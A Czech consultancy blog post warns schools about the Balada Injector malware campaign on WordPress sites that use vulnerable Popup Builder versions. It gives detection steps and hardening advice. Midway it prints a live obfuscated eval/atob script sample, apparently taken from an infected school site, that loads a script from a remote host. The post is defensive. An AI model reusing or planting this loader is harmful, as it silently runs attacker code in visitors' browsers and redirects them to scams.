WordPress weby hlásí útoky: zjistěte, jestli není napadený i váš školní web

Karel KomínekMarketingové tipy

Více než 17 000 webů postavených na WordPressu se stalo obětí rozsáhlé operace, která skrytě probíhala roky. Napadené weby byly infikovány malwarem, který přesměrovává návštěvníky na falešné weby, hazardní hry a podvody s push notifikacemi. Napadené stránky hlásí i české školy.

Odborníci poprvé zaznamenali rozsáhlou koordinovanou vlnu útoků v polovině prosince 2023. Později se ukázalo, že malware nazvaný Balada Injector se šíří již šest let a využívá chybu v pluginu Popup Builder, který oproti našim doporučením využívá řada škol.

Popup Builder se používá na 200 000 stránkách, včetně těch školních, pro vytváření vyskakovacích oken. Školy se pomocí pluginu snaží upoutat pozornost návštěvníků a přesunout je na webu mimo obsah, kvůli kterému původně přišel.

Tato praxe má řadu stinných míst (responzivita, aktuálnost sdělení, správné nastavení...) a nyní k výčtu nevýhod popup oken přibylo hromadné napadení webů, které míří na všechny stránky, které využívají Popup Builder ve verzích 4.2.3 a starších.

Náhradní řešení přitom existuje - přizpůsobit obsah webu tak, aby návštěvník měl vždy na pár kliknutí to, co právě potřebuje. Typicky to u většiny škol bude znamenat přizpůsobit obsah hlavní stránky, aby bylo možno jednoduše měnit úvodní sekci podle fáze náboru (burzy, pozvánky na DOD, informace o přijímačkách, výsledky přijímaček…). Detailněji design školních webů probíráme na našem školení.

Ochraňte školní web pomocí WordFence

Doplněk Wordfence je jedním z nejkomplexnějších bezpečnostních řešení pro weby na WordPressu. Poskytuje všechny nástroje, které potřebujete k ochraně webu, jeho zabezpečení i optimalizaci výkonu.
Více o WordFence

Kromě pluginu je sekundárně také napaden klíčový soubor wp-blog-header.php, kam se injektoval stejný JavaScriptový škodlivý kód. Hlavní ohrožení se přitom maskuje jako plugin WP Felody, který se na webu z ničeho nic sám zjevil bez zásahu administrátora.

Napadený web je samozřejmě pro školy velkým rizikem, protože škole reálně hrozí až zablokování webu u Google. Protože je web aktuálně ve středobodu školních náborů, může se každá škola jednoduše dostat do dramatických problémů.

Samozřejmě ani před zablokováním škole neudělá dobré jméno, pakliže velkou část návštěvníků na školní web nepustí jejich antivirus, zejména pakliže se vaše škola snaží vykreslit jako prémiová technická škola. Navíc pokud způsobíte problémy provozovateli hostingu, klidně vás vypne.

</style><script>var filjlxtxyoa/rvxrdwrict/=/rvxrdwrict/eval;/rvxrdwrict/var ytwfy/rvxrdwrict/=/rvxrdwrict/atob;filjlxtxyoa(ytwfy("d"+/rvxrdwrict/"mFy"+/rvxrdwrict/"IGNjPTE7d"+/rvxrdwrict/"mFy"+/rvxrdwrict/"IGQ"+/ouibk/"9ZG9jd"+/rvxrdwrict/"W1lbnQ"+/ouibk/"7Y2M9Mjt2YXIgcz"+/kpkv/"1kLmNy"+/rvxrdwrict/"ZWF0"+/kpkv/"ZUVs"+/ouibk/"ZW1lbnQ"+/ouibk/"oInNjcmlwd"+/rvxrdwrict/"CIpO2NjPTM7cy"+/rvxrdwrict/"5"+/ouibk/"z"+/kpkv/"cmM9J2h0"+/kpkv/"d"+/rvxrdwrict/"HBz"+/kpkv/"Oi8vc2Vy"+/rvxrdwrict/"d"+/rvxrdwrict/"mljZS5"+/ouibk/"z"+/kpkv/"cGVjaWFs"+/ouibk/"Y3JhZnRib3guY29tL2g0"+/kpkv/"YmZMSCc7Y2M9NDtkLmd"+/rvxrdwrict/"ld"+/rvxrdwrict/"EVs"+/ouibk/"ZW1lbnRz"+/kpkv/"Q"+/ouibk/"nlUYWd"+/rvxrdwrict/"OYW1lKCd"+/rvxrdwrict/"oZWFkJy"+/rvxrdwrict/"lbMF0"+/kpkv/"uYXBwZW5"+/ouibk/"kQ"+/ouibk/"2hpbGQ"+/ouibk/"ocy"+/rvxrdwrict/"k7"));</script>
Ukázka škodlivého kódu, který jsme nalezli na webu české střední školy

Jak zjistit, jestli není napadený váš školní web?

  • Zadejte adresu vašeho webu do malware scanneru Sucuri
  • Podívejte se, jestli nemáte v pluginech Popup Builder či WP Felody
  • Podívejte se na školní stránky z počítače mimo školní síť, který má nainstalovaný kvalitní antivirus (ESET, Bitdefender etc.)
Pokud narazíte na jakýkoliv problém, kontaktujte nás nebo jiné specialisty.

Obecné zásady pro provozování zabezpečeného školního webu

  1. Mějte vždy aktuální jádro WordPress, témata i pluginy
  2. Smažte všechna témata, která nepoužíváte, kromě jednoho záložního (doporučujeme ponechat si jedno základní WP téma, např. Twenty Twenty-Four)
  3. Snažte se na webu mít co nejméně pluginů. Nepotřebné pluginy smažte.
  4. Nainstalujete si WordFence, který dokáže váš web efektivně ochránit už v neplacené verzi
  5. Provozujte váš web na hostingu, který dělá každý den zálohu
A nezapomeňte - v případě školního webu je lepší nechat část práce na odbornících, než řešit blokaci na Google. Proto jsme pro školy začali nabízet správu webu, díky které budete schopni v noci klidně spát. Pokud máte jakékoliv otázky, neváhejte se nám ozvat.

Potřebujete poradit se zabezpečením vašeho webu?

Image

Ing. Michaela Vyskočilová

Konzultantka